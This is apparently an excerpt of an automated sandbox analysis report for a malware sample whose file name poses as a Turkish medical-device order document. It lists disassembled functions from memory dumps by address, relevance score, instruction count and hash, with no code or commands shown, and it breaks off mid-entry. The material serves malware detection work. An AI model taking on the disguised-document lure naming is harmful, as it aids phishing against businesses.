                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 17d0c9c5618bf890c9a5529a27c3d79189a988bcb16aea4a9e7fe6ee9eb68b97
                                                                                                    • Instruction ID: d455cb20c057ee3f6ab91c3712fa4bfdc2098613563ef328867b265677a1a2ff
                                                                                                    • Opcode Fuzzy Hash: 17d0c9c5618bf890c9a5529a27c3d79189a988bcb16aea4a9e7fe6ee9eb68b97
                                                                                                    • Instruction Fuzzy Hash: 3971AEB5A042199FDB14DFA9D8147EEBBE6FFC9210F14842ED405E7290DB389D02CBA5
                                                                                                    Function 075C4AA1 Relevance: .2, Instructions: 236COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b2e0648eb16a4d1db8412a745bfb5af8315b3926bb69d51ccb3a7dd219bdcc3d
                                                                                                    • Instruction ID: 63e6e8d89ad76a5027676067c57737a11ca654e17457e0d5578c0b27ee70385d
                                                                                                    • Opcode Fuzzy Hash: b2e0648eb16a4d1db8412a745bfb5af8315b3926bb69d51ccb3a7dd219bdcc3d
                                                                                                    • Instruction Fuzzy Hash: B7B1D675910619CFDB10EFA8C850AD8FBB1FF49314F05C699D549BB215EB30AA89CF90
                                                                                                    Function 0742BDB0 Relevance: .2, Instructions: 235COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f90b1d70f05bedec0109d34b6c7a6cb5ad031c4d7a34ce34cfa3148998f94dee
                                                                                                    • Instruction ID: 9b4d24748887cdd36046e8dda600e03d9b0ded4b5c78d2a357a798d2cfd81fc9
                                                                                                    • Opcode Fuzzy Hash: f90b1d70f05bedec0109d34b6c7a6cb5ad031c4d7a34ce34cfa3148998f94dee
                                                                                                    • Instruction Fuzzy Hash: 1A91E3F0A10219DFCB11EF68D8886EDBBB0FF45300F51846AE455AB265EB30D966DF81
                                                                                                    Function 075C2D98 Relevance: .2, Instructions: 217COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 61fe623f763a917a3c430e9ec2980e8ab7c756d7c6f86db6d49ac92db1e951b2
                                                                                                    • Instruction ID: 3e08b4a306a289ce7a3af8c0dbf5eda66d5470648e3c2c3a88b410ab3eb9cb41
                                                                                                    • Opcode Fuzzy Hash: 61fe623f763a917a3c430e9ec2980e8ab7c756d7c6f86db6d49ac92db1e951b2
                                                                                                    • Instruction Fuzzy Hash: A971B2B16002069FEB25DBA9D854BEEBBE6FFC4310F10842EE5069B291CF759D42CB51
                                                                                                    Function 07429AF8 Relevance: .2, Instructions: 211COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4dfddec5e942dfed963083c7a7724f097bfd326fe56fc6da51cb857cb279bbaf
                                                                                                    • Instruction ID: afc4b34ae62b27502f93834afa2d8c373e10bdd1dc72a616623618a85d2c68dd
                                                                                                    • Opcode Fuzzy Hash: 4dfddec5e942dfed963083c7a7724f097bfd326fe56fc6da51cb857cb279bbaf
                                                                                                    • Instruction Fuzzy Hash: 8591E4B4A0061A9FCB10CF69C980AEEBBF2FF48310F44856AE925A7360D731E951DF50
                                                                                                    Function 07423007 Relevance: .2, Instructions: 201COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 166474f070731ef09e3927dcde18515ff48061e053ccd5d653110283a68c5ead
                                                                                                    • Instruction ID: d142aae8fdb40d086bdbea87b27dfadcddfa320f803b52f2a26651b35ca6124e
                                                                                                    • Opcode Fuzzy Hash: 166474f070731ef09e3927dcde18515ff48061e053ccd5d653110283a68c5ead
                                                                                                    • Instruction Fuzzy Hash: 3871AD75B00169CFCB04DF68D858AEE7BB2AF89710F54406AE902EB350CB74DC52DBA0
                                                                                                    Function 0742A348 Relevance: .2, Instructions: 155COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 4b097b3cd9e601c4235f0746cab87212e41590ca5eeeb1d01ff4b022f1673d3b
                                                                                                    • Instruction ID: 8c868f012ca8e4fb62c16343172eee3acba96d4e53c6bd125a31b03d39adbf7e
                                                                                                    • Opcode Fuzzy Hash: 4b097b3cd9e601c4235f0746cab87212e41590ca5eeeb1d01ff4b022f1673d3b
                                                                                                    • Instruction Fuzzy Hash: 9041C0B03083118BDB59AAB999205BF77DB9FC6240B58487ED942CB781DF29CC07C766
                                                                                                    Function 075C0C38 Relevance: .1, Instructions: 147COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 21c7fdb2efc60a3ac2d079ab2811279ccc66267c83f1159a861513387403adc8
                                                                                                    • Instruction ID: a02469ab18c86932af677c455253d7e228aa6cf5a73b9decff359a65e2063f1c
                                                                                                    • Opcode Fuzzy Hash: 21c7fdb2efc60a3ac2d079ab2811279ccc66267c83f1159a861513387403adc8
                                                                                                    • Instruction Fuzzy Hash: DE51F674A1061ACFCB40EFA8C8849EDF7B1FF89210B148669E416B7354EB34E985CB90
                                                                                                    Function 075C1800 Relevance: .1, Instructions: 132COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f20dc06398766347d7217b0b99308db4e406e36d8aa74992d1f580af5972dca4
                                                                                                    • Instruction ID: 96e3b26a61c5cd7f2d739b68f066f04b49ec9164f458109602e9b0918f3bb556
                                                                                                    • Opcode Fuzzy Hash: f20dc06398766347d7217b0b99308db4e406e36d8aa74992d1f580af5972dca4
                                                                                                    • Instruction Fuzzy Hash: 844190B4B1160ADFEB15DFA8D558AAEB7B2FF85300F14446ED406E7251DA34D801CB92
                                                                                                    Function 075C0E40 Relevance: .1, Instructions: 131COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: baaf67c2c7278188944e2e3b3f70e9d40caa8efb0a013dc329d5e7aa03377af7
                                                                                                    • Instruction ID: 1567896dd0f29dcc49a78181040086837dc114cf77e21fd81206397660b36f89
                                                                                                    • Opcode Fuzzy Hash: baaf67c2c7278188944e2e3b3f70e9d40caa8efb0a013dc329d5e7aa03377af7
                                                                                                    • Instruction Fuzzy Hash: BE51A435E10609CFCB00EFA8D8849EDF7B5FF89310F00856AE506AB321EB71A945CB91
                                                                                                    Function 0742AF90 Relevance: .1, Instructions: 131COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f1009dffcb0ba0b54a43784b2cb211a9950aec29c117c7bfcca08163bce4452b
                                                                                                    • Instruction ID: e7a89f42cd329e112f0ab90084fdf4652b9074f1beaa94e81550edde0aa99462
                                                                                                    • Opcode Fuzzy Hash: f1009dffcb0ba0b54a43784b2cb211a9950aec29c117c7bfcca08163bce4452b
                                                                                                    • Instruction Fuzzy Hash: A95197B1E04228CBDB219FA5C9444EDFFB2FF89300F61815AD805BB255DB3198A2DF80
                                                                                                    Function 0742C070 Relevance: .1, Instructions: 128COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a92b2df081e8a3308f2c0d48c501b867b9ca0c766a00821504a6830bab3d9173
                                                                                                    • Instruction ID: 766c741795480aad728221298dfba545fea8c4b6517897b3c57129c6b2ee141b
                                                                                                    • Opcode Fuzzy Hash: a92b2df081e8a3308f2c0d48c501b867b9ca0c766a00821504a6830bab3d9173
                                                                                                    • Instruction Fuzzy Hash: 9841A6F0F542769FDB02AF64C88A6FE7BB1EF45240F900457D441E7255E6248923AFA1
                                                                                                    Function 075C0C2A Relevance: .1, Instructions: 125COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 33cb9e4916165fbdc9ff84f2641dbc53ecaf68adfd9caee291675ae78c6b105e
                                                                                                    • Instruction ID: eef768af55c223c0bf4fecd632a8fe709432fcdf0f1df3a0d4447594cfa099c3
                                                                                                    • Opcode Fuzzy Hash: 33cb9e4916165fbdc9ff84f2641dbc53ecaf68adfd9caee291675ae78c6b105e
                                                                                                    • Instruction Fuzzy Hash: 91414CB4A0061ACFCF50DFA4C8846EDF7B1FF89210B14866AD45AE7355EB34E985CB90
                                                                                                    Function 0742B6A0 Relevance: .1, Instructions: 124COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 5532309d5f97cf28103cf4839a82346977d5d8cb537c646383d7f76c85b7cab6
                                                                                                    • Instruction ID: 01ac61c609e5870ba87ac749348a158e18f6aa061ea431b9b3631266740f1dcf
                                                                                                    • Opcode Fuzzy Hash: 5532309d5f97cf28103cf4839a82346977d5d8cb537c646383d7f76c85b7cab6
                                                                                                    • Instruction Fuzzy Hash: A24183F0F541379BDB01AF65C88A6FE77B1EB45340F904827D401E7255E674C923AEA1
                                                                                                    Function 075C9DFC Relevance: .1, Instructions: 123COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 291ce5838af52421339b5e4a5db1cd5e24ffc5c51d02bcaf9f46e271aee10bc4
                                                                                                    • Instruction ID: ecfa6ce7ebde61167379d959cb6cc8c4d02f69ab95c3ec9936403d8e928e3402
                                                                                                    • Opcode Fuzzy Hash: 291ce5838af52421339b5e4a5db1cd5e24ffc5c51d02bcaf9f46e271aee10bc4
                                                                                                    • Instruction Fuzzy Hash: DD4193B1A14209CFEB12CBE8C895BFABBB5FF45344F00C42EE216A7241D7759942CB52
                                                                                                    Function 0742AC68 Relevance: .1, Instructions: 122COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d5ef3f65d37b9aacb7e092b0774cc33cca1abb225211c1609ae1b38f0c344342
                                                                                                    • Instruction ID: b11d231f00825fed0588f1f0d9cd88d79db44102a86822b0887ac6f3ae936402
                                                                                                    • Opcode Fuzzy Hash: d5ef3f65d37b9aacb7e092b0774cc33cca1abb225211c1609ae1b38f0c344342
                                                                                                    • Instruction Fuzzy Hash: 5A418D70B11219CFDB04DF69D850AEDBBB2EF89301F54816AE851FB3A0DB30A842DB50
                                                                                                    Function 074237A7 Relevance: .1, Instructions: 117COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bff8d8e946a0ba06e7cad00ea7805065211518a309419f7f05a466ddeebd6e88
                                                                                                    • Instruction ID: c5e43e4ff33219ebd4ad651b1c0c25a7d763c29e0e074c84a65835daac6ba911
                                                                                                    • Opcode Fuzzy Hash: bff8d8e946a0ba06e7cad00ea7805065211518a309419f7f05a466ddeebd6e88
                                                                                                    • Instruction Fuzzy Hash: B6414C7070011ADBDF059F65E849AAE7BB6FFC8310F54812AF8019B390DB388D66DB90
                                                                                                    Function 0742AC78 Relevance: .1, Instructions: 115COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: cc9eeb5273a83e52486e58637d82a7e41833fa4fde700db6a33e0ade53f67051
                                                                                                    • Instruction ID: 3e96a6b35d10febc462054228ece20a8c3e9f55d22e0fdafd453f693ad70567a
                                                                                                    • Opcode Fuzzy Hash: cc9eeb5273a83e52486e58637d82a7e41833fa4fde700db6a33e0ade53f67051
                                                                                                    • Instruction Fuzzy Hash: 04417D70B10219DFDB04EF69D850AEDB7F2AF89310F54816AE851FB3A0DB70A842DB50
                                                                                                    Function 075C7A46 Relevance: .1, Instructions: 112COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b558d3960ae46f733b218038052395451ccb91c0e3b3ef6a416c49963c8c36d1
                                                                                                    • Instruction ID: 587ed856de7368ecd2f556bed15003d906c202a5b9a7f882c42348f2e08c0ca0
                                                                                                    • Opcode Fuzzy Hash: b558d3960ae46f733b218038052395451ccb91c0e3b3ef6a416c49963c8c36d1
                                                                                                    • Instruction Fuzzy Hash: 9741C7716192958FC7059BB4EC1D3A97FB1BB9B321F044CABD042C7781DA784D058BA1
                                                                                                    Function 075C9250 Relevance: .1, Instructions: 107COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 926c979fe97adc3fcfa5bb4e2b2690e4a5647d690f8f1dbbd7103296ba1070ce
                                                                                                    • Instruction ID: e873ac89ba766aff92a58886870edaa6f9ba5e09728249072254ed8b6967a01f
                                                                                                    • Opcode Fuzzy Hash: 926c979fe97adc3fcfa5bb4e2b2690e4a5647d690f8f1dbbd7103296ba1070ce
                                                                                                    • Instruction Fuzzy Hash: 8B31E3F1A1824ADFDB04DAE4C4557FEBB75FB86700F11485FD542AB681CB32690287A2
                                                                                                    Function 075C1198 Relevance: .1, Instructions: 100COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 96d7f89badd191b755ca1e71445fc0e27c1eef3b760cc024fe9151af3aac1d5c
                                                                                                    • Instruction ID: 865927e3d6eb649e0301976a82a53aa4ba8baa75bbcb4c397930736b32e20b6c
                                                                                                    • Opcode Fuzzy Hash: 96d7f89badd191b755ca1e71445fc0e27c1eef3b760cc024fe9151af3aac1d5c
                                                                                                    • Instruction Fuzzy Hash: A1319DB5E10619DFDB14DFA9D844A9EBBB6FF88310F10822EE502E7260DB719C41CB91
                                                                                                    Function 075CC308 Relevance: .1, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: bd1dd2419bc33a808c0276b51f23b7eb742da27c6aa64cc051525bbbba03d790
                                                                                                    • Instruction ID: f24226d6b869c6cf5d4ac0eacb6328142bf6251579556cc1dfd25d4babe82bc3
                                                                                                    • Opcode Fuzzy Hash: bd1dd2419bc33a808c0276b51f23b7eb742da27c6aa64cc051525bbbba03d790
                                                                                                    • Instruction Fuzzy Hash: 9031E2F0B18108DFD628C699A8507F97767FBC6B11F64886FD10F8FA85CA64C8028376
                                                                                                    Function 075C6B44 Relevance: .1, Instructions: 98COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d5f23f782d3d4818bc86fea7567953a0591cf2e4d5808fa10378ae4f5515e51c
                                                                                                    • Instruction ID: ca7adebf14a6b288580d3b65dcb93215036eb8d15d6079c7ca76dcf0b378125b
                                                                                                    • Opcode Fuzzy Hash: d5f23f782d3d4818bc86fea7567953a0591cf2e4d5808fa10378ae4f5515e51c
                                                                                                    • Instruction Fuzzy Hash: D131D0B0614148CFD704DBD8D4A57EABBF1FB8A318F54882ED1169B381CB79DE428B91
                                                                                                    Function 075C17E0 Relevance: .1, Instructions: 96COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 9ad64af3d843b7ab070620a926157c38f8ad7a5716b9fc56cc56f59a5cbb9c60
                                                                                                    • Instruction ID: 3d6766677a73e6f94a33242bb2821690bc60aa98fe9400b47a65f03c52a4a6f6
                                                                                                    • Opcode Fuzzy Hash: 9ad64af3d843b7ab070620a926157c38f8ad7a5716b9fc56cc56f59a5cbb9c60
                                                                                                    • Instruction Fuzzy Hash: 4531C1F5A1570A9FEB15CFA4D619BAD7BB6BF89300F1444BED402D7292CA34C800CB92
                                                                                                    Function 075CA2E0 Relevance: .1, Instructions: 95COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: a53484e193c2abcfa527f4d3198dc089a26eb33a4de7a22a7f3b05e6b37d1e8c
                                                                                                    • Instruction ID: 46d457e431abcdef378b6f6c1ceef70f4aeaf6a80885d33c5d7afb643df89062
                                                                                                    • Opcode Fuzzy Hash: a53484e193c2abcfa527f4d3198dc089a26eb33a4de7a22a7f3b05e6b37d1e8c
                                                                                                    • Instruction Fuzzy Hash: 883137B290020D9FCF14DFA9D844ADEBFF5FB48320F10856AE509A7210D775A955CBA0
                                                                                                    Function 075C2D88 Relevance: .1, Instructions: 94COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b865d1d15b2270a2f5754e23d19f5c2b700051ea96d32e8121cb68f3bdb40647
                                                                                                    • Instruction ID: e1980223cf03c5b0b110d7df2f4b57503a91c2ab73dc6607a0ff50536e331a1b
                                                                                                    • Opcode Fuzzy Hash: b865d1d15b2270a2f5754e23d19f5c2b700051ea96d32e8121cb68f3bdb40647
                                                                                                    • Instruction Fuzzy Hash: 6D3172B1601205AFDB14EFA5D854BEEB7F6FF88300F10852EE506A7250DB799D41CB90
                                                                                                    Function 0742C4B8 Relevance: .1, Instructions: 92COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2257938097.0000000007420000.00000040.00000800.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_7420000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 507c917cdf4a812fa96174778343bae174e6a8381b86e343066113da3fff643a
                                                                                                    • Instruction ID: f38e8a12c5ac50b13bbddfab7c0cd0ee651ec7440fab1719fb7cd68fdc5684c1
                                                                                                    • Opcode Fuzzy Hash: 507c917cdf4a812fa96174778343bae174e6a8381b86e343066113da3fff643a
                                                                                                    • Instruction Fuzzy Hash: A0316CB1A001298FCB10DFA8C985AEEB7F1EF49300F2545AAE105EB361DB31DE51DB60
                                                                                                    Function 075C22F0 Relevance: .1, Instructions: 90COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000001.00000002.2258187721.00000000075C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075C0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_1_2_75c0000_fiyati_teklif 65TIBBI20_ Memorial Medikal Cihaz Sipari#U015fi jpeg doc.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: f9fd859ae8cbf3e552571c0e0afa5af3600ef999a02c0021c3e175ca63be2523
                                                                                                    • Instruction ID: 5fbdf8302e444caa68b07da15775b6d95abd651ed168e3c18c2561b356e8c4cd
